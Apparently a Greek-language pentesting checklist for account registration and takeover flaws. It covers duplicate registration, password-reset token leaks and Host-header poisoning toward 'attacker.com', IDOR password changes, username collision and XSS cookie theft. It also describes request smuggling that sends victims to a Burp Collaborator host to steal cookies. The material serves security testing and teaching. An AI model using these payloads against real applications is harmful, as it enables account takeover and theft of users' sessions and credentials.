Registration & Takeover Vulnerabilities
Registration Takeover
Duplicate Registration
Προσπαθήστε να δημιουργήσετε χρησιμοποιώντας ένα υπάρχον όνομα χρήστη
Ελέγξτε ποικιλία στο email:
κεφαλαία
+1@
προσθέστε κάποιο τελεία στο email
ειδικούς χαρακτήρες στο όνομα email (%00, %09, %20)
Βάλτε μαύρους χαρακτήρες μετά το email:
test@test.com a
victim@gmail.com@attacker.com
victim@attacker.com@gmail.com
Username Enumeration
Ελέγξτε αν μπορείτε να καταλάβετε πότε ένα όνομα χρήστη έχει ήδη καταχωρηθεί μέσα στην εφαρμογή.
Password Policy
Δημιουργώντας έναν χρήστη ελέγξτε την πολιτική κωδικών πρόσβασης (ελέγξτε αν μπορείτε να χρησιμοποιήσετε αδύναμους κωδικούς). Σε αυτή την περίπτωση μπορείτε να προσπαθήσετε να κάνετε bruteforce τα διαπιστευτήρια.
SQL Injection
Check this page για να μάθετε πώς να προσπαθήσετε να αναλάβετε λογαριασμούς ή να εξάγετε πληροφορίες μέσω SQL Injections σε φόρμες καταχώρησης.
Oauth Takeovers
OAuth to Account takeoverSAML Vulnerabilities
SAML AttacksChange Email
Όταν καταχωρηθείτε προσπαθήστε να αλλάξετε το email και ελέγξτε αν αυτή η αλλαγή επικυρώνεται σωστά ή αν μπορείτε να την αλλάξετε σε αυθαίρετα emails.
More Checks
Ελέγξτε αν μπορείτε να χρησιμοποιήσετε disposable emails
Μακρύς κωδικός (>200) οδηγεί σε DoS
Ελέγξτε τα όρια ρυθμού στη δημιουργία λογαριασμών
Χρησιμοποιήστε username@burp_collab.net και αναλύστε το callback
Password Reset Takeover
Password Reset Token Leak Via Referrer
Ζητήστε επαναφορά κωδικού πρόσβασης στη διεύθυνση email σας
Κάντε κλικ στον σύνδεσμο επαναφοράς κωδικού πρόσβασης
Μην αλλάξετε τον κωδικό
Κάντε κλικ σε οποιαδήποτε 3η ιστοσελίδα (π.χ.: Facebook, twitter)
Παρεμβάλετε το αίτημα στο Burp Suite proxy
Ελέγξτε αν η κεφαλίδα referer διαρρέει το token επαναφοράς κωδικού πρόσβασης.
Password Reset Poisoning
Παρεμβάλετε το αίτημα επαναφοράς κωδικού πρόσβασης στο Burp Suite
Προσθέστε ή επεξεργαστείτε τις παρακάτω κεφαλίδες στο Burp Suite :
Host: attacker.com
,X-Forwarded-Host: attacker.com
Προωθήστε το αίτημα με την τροποποιημένη κεφαλίδα
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
Αναζητήστε μια διεύθυνση URL επαναφοράς κωδικού πρόσβασης με βάση την κεφαλίδα host όπως :
https://attacker.com/reset-password.php?token=TOKEN
Password Reset Via Email Parameter
IDOR on API Parameters
Ο επιτιθέμενος πρέπει να συνδεθεί με τον λογαριασμό του και να μεταβεί στη λειτουργία Αλλαγή κωδικού.
Ξεκινήστε το Burp Suite και παγώστε το αίτημα.
Στείλτε το στην καρτέλα επαναλήπτη και επεξεργαστείτε τις παραμέτρους: User ID/email
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})
Weak Password Reset Token
Το token επαναφοράς κωδικού πρέπει να δημιουργείται τυχαία και να είναι μοναδικό κάθε φορά. Δοκιμάστε να προσδιορίσετε αν το token λήγει ή αν είναι πάντα το ίδιο, σε ορισμένες περιπτώσεις ο αλγόριθμος δημιουργίας είναι αδύναμος και μπορεί να μαντευτεί. Οι παρακάτω μεταβλητές μπορεί να χρησιμοποιηθούν από τον αλγόριθμο.
Χρονική σήμανση
UserID
Email του χρήστη
Όνομα και Επώνυμο
Ημερομηνία Γέννησης
Κρυπτογραφία
Μόνο αριθμοί
Μικρή ακολουθία token (χαρακτήρες μεταξύ [A-Z,a-z,0-9])
Επαναχρησιμοποίηση token
Ημερομηνία λήξης token
Leaking Password Reset Token
Προκαλέστε ένα αίτημα επαναφοράς κωδικού χρησιμοποιώντας το API/UI για μια συγκεκριμένη διεύθυνση email π.χ: test@mail.com
Εξετάστε την απάντηση του διακομιστή και ελέγξτε για
resetToken
Στη συνέχεια, χρησιμοποιήστε το token σε μια διεύθυνση URL όπως
https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
Password Reset Via Username Collision
Εγγραφείτε στο σύστημα με ένα όνομα χρήστη ταυτόσημο με το όνομα χρήστη του θύματος, αλλά με κενά διαστήματα πριν και/ή μετά το όνομα χρήστη. π.χ:
"admin "
Ζητήστε μια επαναφορά κωδικού με το κακόβουλο όνομα χρήστη σας.
Χρησιμοποιήστε το token που στάλθηκε στο email σας και επαναφέρετε τον κωδικό του θύματος.
Συνδεθείτε στον λογαριασμό του θύματος με τον νέο κωδικό.
Η πλατφόρμα CTFd ήταν ευάλωτη σε αυτή την επίθεση. Δείτε: CVE-2020-7245
Account Takeover Via Cross Site Scripting
Βρείτε ένα XSS μέσα στην εφαρμογή ή σε μια υποτομέα αν τα cookies είναι περιορισμένα στον γονικό τομέα:
*.domain.com
Διαρρεύστε το τρέχον cookie συνεδρίας
Αυθεντικοποιηθείτε ως ο χρήστης χρησιμοποιώντας το cookie
Account Takeover Via HTTP Request Smuggling
1. Χρησιμοποιήστε smuggler για να ανιχνεύσετε τον τύπο HTTP Request Smuggling (CL, TE, CL.TE)
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. Δημιουργήστε ένα αίτημα που θα αντικαταστήσει το POST / HTTP/1.1
με τα παρακάτω δεδομένα:
GET http://something.burpcollaborator.net HTTP/1.1 X:
με στόχο να ανοίξετε ανακατεύθυνση των θυμάτων στο burpcollab και να κλέψετε τα cookies τους
3. Το τελικό αίτημα θα μπορούσε να μοιάζει με το εξής
Hackerone reports exploiting this bug * https://hackerone.com/reports/737140 * https://hackerone.com/reports/771666
Account Takeover via CSRF
Δημιουργήστε ένα payload για το CSRF, π.χ: “HTML φόρμα με αυτόματη υποβολή για αλλαγή κωδικού”
Στείλτε το payload
Account Takeover via JWT
Το JSON Web Token μπορεί να χρησιμοποιηθεί για την αυθεντικοποίηση ενός χρήστη.
Επεξεργαστείτε το JWT με άλλο User ID / Email
Ελέγξτε για αδύναμη υπογραφή JWT
References
Last updated